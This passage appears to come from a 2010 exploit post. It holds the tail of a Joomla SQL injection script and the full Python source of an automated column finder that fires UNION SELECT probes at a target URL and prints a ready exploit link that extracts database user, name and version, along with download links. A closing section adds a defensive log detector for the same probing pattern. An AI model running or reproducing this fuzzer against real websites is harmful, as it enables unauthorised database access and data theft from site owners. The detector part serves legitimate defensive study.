        final_check_url += column_finder_url_message

    # If fuzzing is not successfull print this message
    print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?"
    print "Bye!"
    print ""
    print ""


# Checking if argument was provided
if len(sys.argv) <= 1:
    print_usage()
    sys.exit(1)

for arg in sys.argv:
    # Checking if help was called
    if arg == "--help":
        print_usage()
        sys.exit(1)

    # Checking if URL was provided, if yes -> go!
    if arg == "-u":
        provided_url = sys.argv[2]
        print_banner()

        # At first we test if we can actually reach the provided URL
        test_url()

        # Now start with finding the correct amount of columns
        find_columns()

### EOF ###

Download: http://www.xenuser.org/exploits/joomla_sqli_sploiter.py
-
Column fuzzer

#!/usr/bin/python
# Full Automated Column Finder for SQL Injection
# Column fuzzer, version 1.1 (23rd May 2010)
# By Valentin Hoebel (valentin@xenuser.org)
# ASCII FOR BREAKFAST
#
# Useful for SQL Injections. The script tries to determine the amount
# of columns needed for a successful SQL Injection, e.g.
# target/index.php?id=1+AND+1=2+UNION+SELECT+1,2--
#
# You may copy, modify and use this code without asking me for permission
# Share it, use it!
# For educational purposes only. I am not responsible for any damage you might
# cause with this script.
#
# Thanks to rsauron from darkc0de for the awesome Python scripts!
# Greetz to cr4wl3r (you know why ! ) && all my friends and ppl who support me!
#
#
# Usage: python column_finder.py -u http://target-domain.tld/file.php?some_var=some_integer
# Example:
# python column_finder.py -u http://127.0.0.1/index.php?id=1
# Don't forget to supply a correct value for the var or script won't work (e.g. id=1, but NOT id=)!
#
#
# Changelog:
# -------------------------------------------------
# Version 1.1 - 23rd May 2010
# - Some small changes
#
# Version 1 - 22nd May 2010
# - Public release

import sys, re, urllib, urllib2, string
from urllib2 import Request, urlopen, URLError, HTTPError

# Define the max. amount of columns to try
max_columns = 100

# Prints usage
def print_usage():
    print ""
    print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>"
    print "Full Automated Column Finder for SQL Injection by Valentin Hoebel (valentin@xenuser.org)"
    print "Version: 1.1 (23th May 2010)"
    print "Usage:"
    print " -u <URL> (e.g. -u http://target/index.php?id=1)"
    print " --help (displays this text)"
    print "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
    print ""
    print ""
    return

# Prints banner
def print_banner():
    print ""
    print ""
    print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>"
    print ""
    print "Full Automated Column Finder for SQL Injection"
    print "by Valentin Hoebel (valentin@xenuser.org)"
    print ""
    print "Version: 1.1 (23th May 2010)"
    print ""
    print "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
    print ""
    return

# Testing if URL is reachable, with error handling
def test_url():
    print ">> Checking if connection can be established..."
    try:
        response = urllib2.urlopen(provided_url)
    except HTTPError, e:
        print ">> The connection could not be established."
        print ">> Error code: ", e.code
        print ">> Exiting now!"
        print ""
        sys.exit(1)
    except URLError, e:
        print ">> The connection could not be established."
        print ">> Reason: ", e.reason
        print ">> Exiting now!"
        print ""
        sys.exit(1)
    else:
        valid_target = 1
        print ">> Connected to target! URL seems to be valid."
        print ""
    return

# Find correct amount of columns for the SQL Injection
def find_columns():
    # Define some important variables and make the script a little bit dynamic
    number_of_columns = 1
    column_finder_url_string = "+AND+1=2+UNION+SELECT+"
    # Hex-encoded marker string, decodes to the plain text below
    column_finder_url_message = "0x503077337220743020743368206330777321"
    column_finder_url_message_plain = "P0w3r t0 t3h c0ws!"
    column_finder_url_terminator = "--"
    next_column = ","
    column_finder_url_sample = "concat(user(),database(),version())"

    print ">> Trying to find the correct number of columns..."

    # Craft the final URL to check
    final_check_url = provided_url + column_finder_url_string + column_finder_url_message

    for x in xrange(1, max_columns):
        # Visit website and store response source code of site
        final_check_url2 = final_check_url + column_finder_url_terminator
        response = urllib2.urlopen(final_check_url2)
        html = response.read()
        find_our_injected_string = re.findall(column_finder_url_message_plain, html)

        # When the correct amount was found we display the information and exit
        if len(find_our_injected_string) != 0:
            print ">> Correct number of columns found!"
            print ">> Amount: ", number_of_columns

            # Ask if a sample URL should be provided
            user_reply = str(raw_input(">> Do you want to have a sample URL for exploiting? (Yes/No) "))
            if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
                print ""
                # Print a sample URL for exploiting and replace test string with some useful stuff
                print string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample)
                print ""
                print "Simply copy and paste this link into your browser Have fun! Bye :)"
                print ""
                print ""
                sys.exit(1)
            else:
                print ">> Ok, bye =)"
                print ""
                print ""
                sys.exit(1)

        # Increment counter var by one
        number_of_columns += 1

        # Add a new column to the URL
        final_check_url += next_column
        final_check_url += column_finder_url_message

    # If fuzzing is not successful print this message
    print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?"

# Checking if argument was provided
if len(sys.argv) <= 1:
    print_usage()
    sys.exit(1)

for arg in sys.argv:
    # Checking if help was called
    if arg == "--help":
        print_usage()
        sys.exit(1)

    # Checking if URL was provided, if yes -> go!
    if arg == "-u":
        provided_url = sys.argv[2]
        print_banner()

        # At first we test if we can actually reach the provided URL
        test_url()

        # Now start with finding the correct amount of columns
        find_columns()

print ""
print ""

### EOF ###

Download: http://xenuser.org/tools/column_finder.py
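Defender-side counterpart, added here and not part of the post or of Valentin Hoebel's tool: a detector that reads web access-log lines for the fuzzer's request pattern (a UNION SELECT whose column count climbs by one per request from the same client) and flags that enumeration. The log lines, client addresses and the run threshold are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined format). The hex literal is the fuzzer's
# "P0w3r t0 t3h c0ws!" probe, repeated once more per request as the tool adds a column.
MARK = "0x503077337220743020743368206330777321"
SAMPLE_LOG = "\n".join(
    ['203.0.113.7 - - [23/May/2010:10:00:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120']
    + ['203.0.113.7 - - [23/May/2010:10:00:0%d +0000] "GET /index.php?id=1+AND+1=2+UNION+SELECT+%s-- HTTP/1.1" 200 4011'
       % (i, ",".join([MARK] * i)) for i in (1, 2, 3)]
    + ['198.51.100.4 - - [23/May/2010:10:00:05 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5122'])

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r'union\s+(?:all\s+)?select\s+(.*?)(?:--|#|$)', re.I | re.S)

def count_top_level_columns(select_list):
    """Count comma-separated select items; commas nested in parentheses (concat(a,b)) do not split."""
    depth, columns = 0, 1
    for ch in select_list:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth = max(depth - 1, 0)
        elif ch == "," and depth == 0:
            columns += 1
    return columns

def union_column_count(path):
    """Column count of a UNION SELECT in the URL-decoded request path, or None if there is none."""
    m = UNION_RE.search(unquote_plus(path))
    return count_top_level_columns(m.group(1).strip()) if m else None

def find_column_enumeration(log_text, min_run=3):
    """Return (ip -> UNION column counts in request order, IPs whose count rose by one min_run times)."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        n = union_column_count(m.group(2)) if m else None
        if n is not None:
            seen[m.group(1)].append(n)
    flagged = []
    for ip, counts in seen.items():
        run = 1  # length of the current +1-per-request sequence of column counts
        for prev, cur in zip(counts, counts[1:]):
            run = run + 1 if cur == prev + 1 else 1
            if run >= min_run:
                flagged.append(ip)
                break
    return dict(seen), flagged
```

The same counter also tells a responder how far the enumeration got, since the last count before a status or size change in the log is the column count the probe settled on.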
